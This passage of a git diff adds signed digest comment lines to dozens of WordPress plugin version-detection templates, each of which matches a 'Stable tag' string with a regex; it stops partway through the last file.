a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..3ae5d294bd 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c355df2988d711d0c9242d259dd8b36177dbc730fc37d3f83d101a2422a925c8022100badaea1b22ec2e6bc464a7c111649e6bba5474d12e2d39e80bc2237f1471e44f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..23af31efea 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022059f83df7a70dc13b47db2de3804294838a281ee5d16baf26f218bc86473ca23202210094e7e6435ae3c29342910fb4366f295d8dd5fdd9ac340516878ef1eddfaaa4b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..a2e9fce44d 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c4dacc0797bce31afd5c3d2d96748997accc9fc3a7121bfcdf9a835ba97b398022100c597424589d7c601b27868a2424ac0454ff1a543c13e471880cc237f0a1238d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..52e07dd427 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cdbeaf034ae2ee9e999205cdf6e5e6c5f5022abf3acad5e2982c24c3fe61af990220782f3ea34996694f2fc04f0c8422b840caba05e3db0ccf68942b85b8d0243d15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..28ebd79b40 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220177315f59172c95a981143c3a14f09f3e8e028e645137e9666fa6117ebc3e78f022100e3c6380a6093bdf2a6527e0f16f01cebf124002439ab92390854fbfa9ca97083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..d38f98b8e1 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a90957e70e516a189fd8654384d035b34195b9bac470ab48ff7432e8950e16d4022100da3b6d6342ace4a0edf15b65269bb469d1c8c6f1aabf8b82f4419bdbec618fb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..04aeb3ae33 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220757a2c6e97ebe9d26e77960166b78b76236364332d49882d0f2d2fae6035ca8b02204f273738b5f686fc373c860259d7608475bf60d4b744bc22743dd10885a7875c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..7f180e29f9 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4361efe1681c30df44f5ccfd1b2c6eee0c12b6d69b139814ae516cd76c3ba150220102cdcd9420fc3036d527e92f3fc5a24bb9c54175dfeddaea6eb8b16be52fe60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..3a49b64613 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a328f783173162e3672c5e346dea72efdde888f8a6277b343331105e00d25e89022006a8d0714b7a6c6cf0b69b25eea10af7b9c46dfd0b2af416ada5bc828f9e2278:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..608e5ece69 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ac8f8d47893fedfe0423d1c53d16261160bec25d57f909616632b34c02328eb022077efd46e7fbc0ca58827abe07c5713371e015bc8e1409ced99b3f1544a7477af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..1083620794 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220553d74d7590c39bef77b305a7cfbce405e5914dc44316ba95dbe5a30a2a44f01022100826cbfe8af1b2e414e7c94dff11d0a18cba0178c1cb6393495c3c90c784ed708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..18db107468 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c852c8312e95300ae6e4291f9959fcaa2fc834684fd2f2cd125c926da4b8e8e3022100a35b8318c8ba67b07bf213feebc96679be3124ef6402ffd4d0be4abd7c50e964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..1bd84e2ae1 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f2c3c3c53d187d7101e21c18e85fa29e61da9aaebf929569223346d17ef5876022100df15222e1adac3cc18063168b73aba749d0a796b41369ace67d64c132ff41c49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..68315a3166 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b44b53ff527574ae0bbe78d824bb071bef2eac5b77d0e9ae67100708a4121ee3022100dbc72f06511f2dd1b6d35f36a6df2f4029fea0972a3429aaa2faa1e9981fd4d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..661af31ac5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a107f5a871b792554f078f9a6fa92bdb3df7140806a0d60cdf4f1c8263fa449d0221008325ca9bcba2f2ca81f7bca97833e50722baf3ecc7f337521d47f6d71a214570:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..ca6de535c8 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206db78bcbfeef655e7a495fdaa186a87b7036912484cd1cb081af4e93243e1f3d022100d66f4fb570c0d04a0d8e66e899218484384fa29967b2b5ff97680b340d8720c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..12d65bfc6a 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b646a545fd6932640f9969536cb51322c3c7604dda36093fc0a36918e51ed7a002205accea89e77e115fb082a73e71afaaeb073c7d38183876940b8a8240182aaf99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..4e1a96688e 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3058c19712ad56b159dba866dd549d877c3ce2c6e41a60971cb79b23a64c103022100e2bb506554560a0bc03c942006e8b80f5f470d8123ad739e8bffe8adc3f44b63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..794529e578 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e1de6933399c3e09c84ca1af66d6a397eaf2c8ce682e7b88cc71eef04daa47f02204e6df57b9363adaccbd714f92ca21c0c52edfd51a8afcff31c0504e3f29798be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..928513400c 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bbc64de572645d495cae9a3002f866a4360a131bd0977a739517c417bcd37284022100afd6f142638d139fa73da6f43f23b45d7d86907a00ceb17a137480049af9eb77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..ca291f5834 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207e7a1afe2dffdaee7ce3503beb0d3e31db07153521b7d45bd67e67231763b6950220616db5ce8fb4fa6ebaa950d45f9a01ce00b44514715cec61384237a67c8a2551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..986cb8b9ae 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079cfce8860376984c9ef6642f28249d8c7d1f77870fbd0a6d742305f83692cd2022049fa42eeb87e6c33bdd3a91a644878b7f6eb414039a88b2f4b2dac524d8bf77f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..622b0da8b7 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204d10f697cf59e24dbb1f85b21ab03a5dc5df804aad70cb08a474d70f3dcae10902205310bd5f0321e3008dd9119724865be76306e0e90eaad721ca739d5932c1853d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..52d3e6f22b 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a6fe30593bc9278aa80e0f00fb16d6cd484c380fdf099c319e4958694537d21022100cd474609d4ac97c93fbf7dcbbd1bb9b559110ae69ccffac0214ccab6aa275ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..881ea912b0 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d24a0125b55553a0535641477ea5db735d199ae3f148d534143dec1b139051bb02210090ccb6e9384c25dea0aef1369ad9e8baeb0150ec81bbd309a30acc0274103911:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..d6f191b290 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220427bb597849241945c6cbc4eefa7f733e172f424a1d7cde3d381923291abf9cb022055ca32ec1eab60b64abef460e6d1e93816bad548222fd9eb4efc09cf3ee68ef7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..0c2dea4c7d 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048d55df795c346b3bc98c6a4b3ea9af6454362cb9bf6fdd386d43b9986969cb402210094a46acdfacb36a69fef1a312ec08196801f8321fb36f2ac808d77248d5c22aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..eb106c4fe7 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206d4ffeb8f4b4257d3218d601c4f73ca4da75905af404ba74203ec9efdbcb4de3022100f4e152ccd146b34a8856f6477ff28e2895b9272ea17536b336d475ab7affb6cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..5feb7ca782 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008ba7f3c7fee4d8781616f5097833b4372300eac891d0b2efbaa95c9778a03bf60220752415dc518f70379cdefcff5ec7c06fb08f9c1415fbaae3d2ad97c45722fc78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..cc0c7bf109 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220022e5c7bb721e771b4a894fe930fb63a467ad47dd74a5298e0841ef510a51eee022100c504794b56a01deac710cc2aea7dec2453654ab77df9fb2ec85193a1abf83c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..8d13a363df 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7ca6e6adf1414274538f515126374d93e9ac9744163c1be1c729212a650bc7f022060f26d14e74b4ad0cfc2c19fd8fd70264cfa00272908278d01ee3b9bdab9cfd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..0ed4132adf 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210098bdce552e8c838567c2d3425e3be57d57a9318e13082bb01cf40fe964b6aef1022100b4235ad8ddf6342a193f99978fb5745d491c2be902f962bc722c0fc6c1488bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..d6db931058 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203809f656a09424d6e98ea44d80c649ab30976e5ff7ce036a85d1e25d4145cee50220569db2db19d9090cbca314d570c122d38a3974fe8c7bbf055be00a80d69025f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..b7120ce4ad 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cecd7efdcda44b6c450e3f018869926c19aeafcbbb2dd52506daddf52500909502202b3918555aa56d1e2d2d3dc5a30cd77a32cff2c5212f59815312dad68fea1055:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..de557b9b98 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b23d869b1de1a151875d112ba774717df3bc98c2e9eaf8b6dfedc8a0bb82fa66022100abe67c6aa5e9431c5ac46e135fc5f6b5532a00ddf8f3063770a0b96fed1a6100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..e73b2a60fe 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bfff151617b7e195ad148ceb53325f3319058d118d0823a96341e1497bbd7d00022061f401fa790765535b06514f64acb922cd6d9f6dae778a22599a66feeec94cf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..ef02198b1a 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205d5a52aa5d5585a28958d66395375ccac841cf8f30044d5e555f9318f02d6d2e022100d378df13c03de2672b933a163d878ba337873f0931f15c72f2a1826925f510d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..4f944b59eb 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201830b4051da2cd9d5d3e392af6fd31aae70e574dda6ffd73394285da54cda143022100fa5d5acefe9b7888e833bc2748b759fe7d2affa891d24a49c63cc62cb9e166c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..1b7ce5a32f 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022037d4a355563051862cd41498ba0d6e6a290fa2a42bfa89222b1f1c528f52f27602205af791958078740e5bc2800d3c221593551db8d09db304d8f5378cbace00c94b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..8563609e57 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204cf0ef11ee4ceec7f14807357ff6f6bcf1f6c834ece10736d8ee293f79e4535e022100db4f41c11ad2a4e1c3c41ced2a6c20d84d4c14b6a254b85ba1c2baaa623600ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..e163f2412f 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a60481802645d4de48451f23f54dd0bdf7f19f9a08d6d7935bf9622ef9a056b002206b490e6ddbd70719c7941b6425d6ff65be2c5e6d5ab27f2bbb30789a14010846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..ba9f587922 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f7d708e9176b4c275a0b1020e6e0d6276400d43a222104bfd06ed50731e261f1022100dad340015bc5190c15c2de4995bd19c4da6fbb7c34f569a655e7e8643e411cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..a364017f9d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012b1de9a32890dbd47f4da7ca49bade4184250f64d362eb9406f3cb8db36aeff022055ebf18dfe455865489273337fa3b2096d63d1e78e4b93c577eac591ce9dea86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..4041a36e9d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077c305678d1bdee41320069bc09368a95821df545e02d27026952d097fe8a0b5022065cea90faf194e944a797f5e0c0d641b2c9e869b6d35a48f2783e67c06baa90a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..7b8dd95096 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b01dd1e7fbabc9f5f9b5233cd47436df6c662da642efb51fd8e56aafc678b26d022100eded69d500b3209a28e2959cff4f7dfbb8218c721898a332ae00f99b2f8a620d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..be52129b15 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e1e3ba1c9f17b178821015798bf08418df4e9682690f372cbb48173a8ab0d3f022100f77cb4ef40aed820987a62cc99a6461178b7d446cf7b471b359a34c017f61d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..3fa3a07f30 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ 